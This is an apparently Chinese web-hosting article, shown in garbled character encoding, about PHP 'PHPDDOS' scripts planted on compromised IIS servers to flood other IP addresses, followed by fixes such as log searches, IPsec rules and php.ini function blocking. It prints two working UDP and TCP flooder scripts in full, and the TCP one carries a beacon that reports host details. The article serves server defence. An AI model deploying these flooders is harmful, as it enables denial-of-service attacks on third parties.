php對(duì)外發(fā)包引發(fā)服務(wù)器崩潰的終極解決方法分享[推薦]
用php代碼調(diào)用sockets,直接用服務(wù)器的網(wǎng)絡(luò)攻擊別的IP,常見(jiàn)代碼如下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with
$packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \".
round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
二、表現(xiàn)特征
一打開(kāi)IIS,服務(wù)器的流出帶寬就用光-----就是說(shuō)服務(wù)器不斷向別人發(fā)包,這個(gè)情況和受到DDOS攻擊是不同的,DDOS是服務(wù)器不斷收到大量數(shù)據(jù)包.
近期由于DEDECMS出現(xiàn)漏洞而導(dǎo)致大量服務(wù)器出現(xiàn)這個(gè)問(wèn)題.
如何快速找到這些站?
你可以打開(kāi)日志
C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打開(kāi)今天時(shí)間的文件,
里面有類似這樣的記錄:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
最后三項(xiàng) 783 Disabled 30_FreeHost_1
783就是這個(gè)站在IIS中的ID
30_FreeHost_1就是所在池
三、解決辦法
1.按上述找到這個(gè)網(wǎng)站后停止它.或停止池,并重啟IIS.
2.在IP策略,或防火墻中,禁止所有udp向外發(fā)送
在星外最新版本的安全包中,已帶有4.0版本的IP策略【下載safe包】,您導(dǎo)入后就直接可以限制了外發(fā)的UDP包。下載這個(gè)包,之后導(dǎo)入安全策略。但這個(gè)策略并沒(méi)有關(guān)閉DNS端口,部分攻擊還是有效.
為了解決這個(gè)問(wèn)題,你也可以調(diào)整IP策略,限制udp只能訪問(wèn)特定的DNS服務(wù)器IP,如8.8.8.8,除非黑客攻擊這個(gè)IP,不然攻擊也是無(wú)效的,你可以在網(wǎng)卡DNS中設(shè)置一個(gè)你才知道的DNS IP,并且不要公開(kāi),然后調(diào)用IP策略中的udp open部分就可以解決.(打開(kāi)IP策略的屬性,雙擊open,將open中的兩條udp記錄刪除任意一條,在保留的這條中,雙擊,改成 地址 從源地址 任何地址 到目標(biāo)地址 "特定IP 這個(gè)IP就是設(shè)置為你自己的DNS IP,如8.8.8.8" 保存后就行了 )
在2011-4-27,我們上傳了新的安全包,里面有一個(gè)"星外虛擬主機(jī)管理平臺(tái)IP策略關(guān)閉所有UDP端口用.ipsec"文件,您可以導(dǎo)入它并啟用,就可以關(guān)閉所有udp端口,就可以完全防止這類攻擊,但是,這個(gè)策略由于關(guān)閉了DNS端口,會(huì)造成的這臺(tái)服務(wù)器上無(wú)法用IE訪問(wèn)任何域名,因此,用戶的采集功能也就用不了.(同樣,如果在主控網(wǎng)站上用了這個(gè)策略,就會(huì)造成的受控自檢不通過(guò),因?yàn)榻馕霾涣擞蛎?另外,部分用戶反映此策略會(huì)造成的mysql不正常)
3.用一流信息監(jiān)控,在SQL攔截及網(wǎng)址攔截中,攔截port=這個(gè)關(guān)鍵詞(其他關(guān)鍵詞可以刪除.)
4.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號(hào)要?jiǎng)h除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會(huì)造成很多php程序都不正常.
另外,這也表明你的服務(wù)器安全做得不錯(cuò),如果能入侵.黑客就直接提權(quán)了,還DOS做什么?
近期已有新的基于TCP攻擊的PHPDDOS代碼如下:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".
php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
同樣,可以采有以下解決辦法:
1.也可以直接禁止上面的代碼,如改win\php.ini后重啟IIS
ignore_user_abort = On
(注意前面的;號(hào)要?jiǎng)h除)
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上
fsockopen,set_time_limit
但這樣會(huì)造成很多php程序都不正常.
2.在IP策略中禁止所有外訪的TCP數(shù)據(jù)包,但這樣會(huì)造成的采集功能無(wú)效,也不能用在主控服務(wù)器上。
3.在服務(wù)器要用關(guān)鍵詞tcp:或udp:搜索所有php類文件,找到攻擊文件,刪除它。
以上方法供 vps、服務(wù)器托管用戶學(xué)習(xí)!
- sqlserver not in 語(yǔ)句使程充崩潰
- linux下監(jiān)視進(jìn)程 崩潰掛掉后自動(dòng)重啟的shell腳本
- Android 如何收集已發(fā)布程序的崩潰信息
- js中關(guān)于一個(gè)分號(hào)的崩潰示例
- jquery.uploadify插件在chrome瀏覽器頻繁崩潰解決方法
- iOS 捕獲程序崩潰日志
- 數(shù)據(jù)庫(kù)崩潰,利用備份和日志進(jìn)行災(zāi)難恢復(fù)
- 詳解Android中處理崩潰異常
- Android實(shí)現(xiàn)將應(yīng)用崩潰信息發(fā)送給開(kāi)發(fā)者并重啟應(yīng)用的方法
- 解決iOS7上UITextField限制字?jǐn)?shù)輸入導(dǎo)致崩潰問(wèn)題的方法
相關(guān)文章
IIS APPPOOL\DefaultAppPool 登錄失敗的解決方法
為大家介紹下解決IIS APPPOOL\DefaultAppPool 登錄失敗的方法,有遇到類似問(wèn)題的朋友參考下2013-10-10Windows Server 2019 WEB和FTP服務(wù)器的配置方法
這篇文章主要介紹了Windows Server 2019 WEB和FTP服務(wù)器的配置方法,這都是基本的,需要的朋友可以參考下2022-08-08IIS中301重定向跳轉(zhuǎn)web.config規(guī)則和http重定向模塊的實(shí)現(xiàn)教程
301跳轉(zhuǎn)對(duì)于搜索引擎而言,便是告訴搜索引擎:“此url地址已經(jīng)永久的進(jìn)行跳轉(zhuǎn)到了‘XXX’url地址?!倍鴮?duì)于用戶而言,301跳轉(zhuǎn)后的網(wǎng)站,在用戶使用的時(shí)候,輸入舊的地址,會(huì)自動(dòng)跳轉(zhuǎn)到新的地址。在IIS中實(shí)現(xiàn)301重定向有web.config規(guī)則和IIS中的http重定向模塊兩種方式。2023-04-04vps報(bào)錯(cuò)Unable to make the session state request
客戶反應(yīng)vps報(bào)錯(cuò)Unable to make the session state request,我司技術(shù)將解決方法總結(jié)如下,希望可以幫助更多的人解決這個(gè)問(wèn)題。2011-12-12基于ISAPI Rewrite軟件實(shí)現(xiàn)IIS圖片防盜鏈方法
為了實(shí)現(xiàn)網(wǎng)站上面的圖片防盜鏈,根據(jù)網(wǎng)絡(luò)上搜集的資料加上自己的實(shí)踐,終于實(shí)現(xiàn)了iis下的圖片防盜鏈功能。2010-07-07國(guó)內(nèi)首款同時(shí)支持自定義404/505/rewrite的asp服務(wù)器(netbox制作,開(kāi)放源代碼)
國(guó)內(nèi)首款同時(shí)支持自定義404/505/rewrite的asp服務(wù)器(netbox制作,開(kāi)放源代碼)...2007-09-09sqlserver 普通用戶運(yùn)行錯(cuò)誤解決方法補(bǔ)充
本方法作為Windows2003服務(wù)器安裝及設(shè)置教程——MSSQL安全篇一(將MS SQL SERVER運(yùn)行于普通用戶下)的補(bǔ)充,成功解決了不能將sqlserver運(yùn)行在普通用戶的權(quán)限下的問(wèn)題。2010-05-05詳解CentOS 7 下安裝 Docker 及操作命令的方法
這篇文章主要介紹了CentOS 7 下安裝 Docker 及操作命令的方法,需要的朋友可以參考下2016-10-10使IIS支持PHP,ISAPI或CGI,FastCGI完全配置教程(最新php5.2.13配置方法)
使IIS支持PHP,ISAPI或CGI,F(xiàn)astCGI完全配置教程(最新php5.2.13配置方法),我是比較完整的一個(gè)版本,對(duì)可能出現(xiàn)的問(wèn)題給出了具體的解決方法。2010-12-12windows使用nginx實(shí)現(xiàn)網(wǎng)站負(fù)載均衡測(cè)試實(shí)例
如果你關(guān)注過(guò)nginx,必定知道nginx這個(gè)軟件有什么用的,如果你的網(wǎng)站訪問(wèn)量越來(lái)越高,一臺(tái)服務(wù)器已經(jīng)沒(méi)有辦法承受流量壓力,那就增多幾臺(tái)服務(wù)器來(lái)做負(fù)載吧。2010-03-03